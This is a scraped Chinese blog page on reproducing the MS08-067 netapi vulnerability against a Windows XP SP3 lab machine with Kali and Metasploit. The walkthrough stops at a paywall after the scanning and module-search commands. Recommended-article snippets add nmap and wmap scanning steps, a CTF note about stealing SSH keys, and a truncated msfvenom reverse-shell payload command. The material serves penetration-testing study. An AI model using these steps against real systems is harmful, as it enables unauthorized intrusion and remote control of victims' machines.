使用kali对服务器进行漏洞扫描_利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

最新推荐文章于 2023-01-29 12:32:44 发布
最新推荐文章于 2023-01-29 12:32:44 发布
阅读量813 收藏 4
点赞数
文章标签: 使用kali对服务器进行漏洞扫描
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29361879/article/details/112781433
版权

转自:CARlos_97

今天闲来无事,打开Kali来了一波MS08-067-netapi的复现
就是服务器服务中的漏洞可能允许远程执行代码
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。

实验准备

Kali虚拟机
靶机:Windows XP sp3

实验操作

打开Kali和靶机,ifconfig得到Kali IP 192.168.43.120
通过Nmap 扫描得到靶机 IP 192.168.43.201

进入matesploit
首先连接上postgresql

service postgresql statr

  • 1

3bff3f761333d4311208d38c098d601b.png

寻找ms08_067_netapi模块

search ms08_067_netapi

  • 1

最低0.47元/天 解锁文章
Blue许
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中职网络安全-应用服务漏洞扫描利用
路漫漫其修远兮
08-17 391
flag:sV由上体所得31337是http服务flag:[bash_history,bashrc,profile,ssh,robots.txt]flag:['id_rsa', 'authorized_keys', 'id_rsa.pub']下载三个私钥密钥flag:simonflag:softwareflag:starwars寻找可以以root用户执行的文件查看root目录下read_message.c文件进行代码审计 #include <stdio.h> #include ...
任务三-应用服务漏洞扫描利用
weixin_48800344的博客
12-13 3070
应用服务漏洞扫描利用 任务环境说明:  服务器场景:Server15  服务器场景操作系统:未知(关闭链接) 使用命令nmap探测目标靶机的服务版本信息,将需要使用的参数作为FLAG进行提交; -sV 通过上述端口访问靶机系统并探测隐藏的页面,将找到的敏感文件、目录名作为FLAG(形式:[敏感文件或目录1,敏感文件或目录2…,敏感文件或目录n])提交; 开放了80和31337端口说明存在网站,利用dirb扫描此网站目录 存在robots.txt目录 Flag: 就是dirb扫描出现的
基于Windows XP SP3系统下MS08067漏洞攻击
Lorezon的博客
11-21 1707
0x00 写在前面 MS08_067是一个很经典的漏洞,是我了解网安时候接触到的第一个漏洞。只不过那时候什么都不懂。其实很久之前就想写一篇08067漏洞,但是靶机一直有问题,就一直在拖延。现在终于有机会了。不多说,直接搞。 0x01扫描漏洞 0x02启用msf,查找08067 0x03利用模块 0x04 show payloads查找攻击载荷 可以看到有很多的载荷,我们选用返回shell...
kali linux渗透测试之漏洞扫描
qq_57223070的博客
09-26 1万+
skipfish、nessus、AWVS、nikto的简单使用及功能倾向介绍。
KALI漏洞扫描
hacker681的博客
01-14 6576
漏洞扫描 发现漏洞 端口开放的跑的是什么服务这些端口上的服务使用的软件的版本等等的信息有了这些信息的时候可以到官方网站去比较一下最新的版本是什么版本两个比对一下你会发现有补丁列表官方修复了什么漏洞如果高危漏洞的话就可以直接控制目标系统。所以通过之前掌握的信息呢可以以此为基础对目标系统存了什么漏洞弱点来判断,这样做有很大的弊端就是扫了很多端口每个端口跑了很多服务 要忙于在大网站上面去查询官方的文档阅...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
49-49.渗透测试-Kali Linux漏洞扫描.mp4
最新发布
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
利用win系统ms08-067漏洞.docx
10-26
在实际攻击中,攻击者可以使用漏洞实现对目标主机的控制,进行恶意活动。 MS08-067漏洞是一個非常危險的漏洞,它可以允许攻击者在无需身份验证的情况下远程执行代码。因此,管理员需要确保系统的安全补丁是最新...
kali-linux-wireless-pentest_kali使用指南_productg6t_kali_kali-linux-
10-01
kali Linux详细指南,后续在更新
2021Kali系列 -- 漏洞检测(wmap/db_nmap)
weixin_41489908的博客
04-20 2410
我反感任何人以一种开玩笑的语气说着我最在意的事。。。 ---- 网易云热评 一、wmap模块 0、启动并连接数据库 service postgresql start 1、加载插件 load wmap 2、添加站点 wmap_sites -a http://192.168.139.132 3、列出站点可用的目标 wmap_sites -l 4、添加目标 wmap_targets -t http://192.168.139.132 5、测试目标 wmap...
《黑客之道》kali Linux之NMAP高级使用技巧和漏洞扫描发现
xueshenlaila的博客
11-04 340
MS08_067复现+远程控制
热门推荐
信安是不可或缺的一部分!
07-29 4万+
环境 主机 ip kali Linux 192.168.252.128 Windows xp 192.168.252.148 漏洞介绍 https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067 Metasploit渗透测试模块 Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119
Kali远程控制Windows系统(Metasploit)
董哥的黑板报
06-24 2万+
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
网络安全工程师演示:黑客是如何使用Nmap网络扫描工具的?
Kali与编程
05-28 460
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 通常我们在进行渗透测试的过程中需要对目标主机的端口开放状态进行探测,从而了解目标主机,进行对应的
kali环境下熟悉漏洞扫描
qq_45653152的博客
05-21 1685
在虚拟机环境下熟悉漏洞扫描 漏洞扫描器是对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但是也存在错误扫描,需要对扫描结果进行漏洞验证。 漏洞扫描工具 – nmap Nmap –script vuln 目标ip地址 Ip:61.136.204.34 高强度的扫描时用它确定正在运行的机器。默认情况下,nmap只对正在运行的主机进行高强度的探测。 -PS [portlist] (TCP SYN Ping):发送一个设置了SYN标志位的空TCP报文,尝试建立连接,成功返回报文up以及运行信息,失败返回d
小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto
ZiXuanFY的博客
10-09 1万+
#WEB渗透 靶机:metasploitable 靶场:DVWA【默认账号/密码:admin/password】 #新手先将DVWA的安全性,调到最低,可容易发现漏洞 侦察【减少与目标系统交互】 Httrack:将WEB可下载的页面下载到本机,再进行本地检查【kali下安装】 ##可到此网站获取代理:hidemyass.com【免费代理需小心】
#windowsxpsp3系统MS12-020漏洞测试
bmxch的博客
01-20 407
#windowsxpsp3系统MS12-020漏洞测试 漏洞描述: MS12-020 全称为“远程桌面协议RDP远程代码执行漏洞”,RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统蓝屏。 影响环境 Windows 2000、WindowsXPWindows server 2003、Windows Vista、Windows server 2008、Windows7
模拟黑客使用Kali Linux远程控制Windows(互联网)
HKBlackeagle的专栏
01-29 3134
通过内网穿透实现kali控制windows
kali漏洞扫描工具如何使用
05-29
使用Kali Linux自带的漏洞扫描工具需要一定的技术水平和实践经验,以下是一些漏洞扫描工具的使用方法简介: 1. 使用Nmap进行端口扫描:在终端中输入命令“nmap -sV [目标IP]”,等待扫描结果即可。其中“-sV”表示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值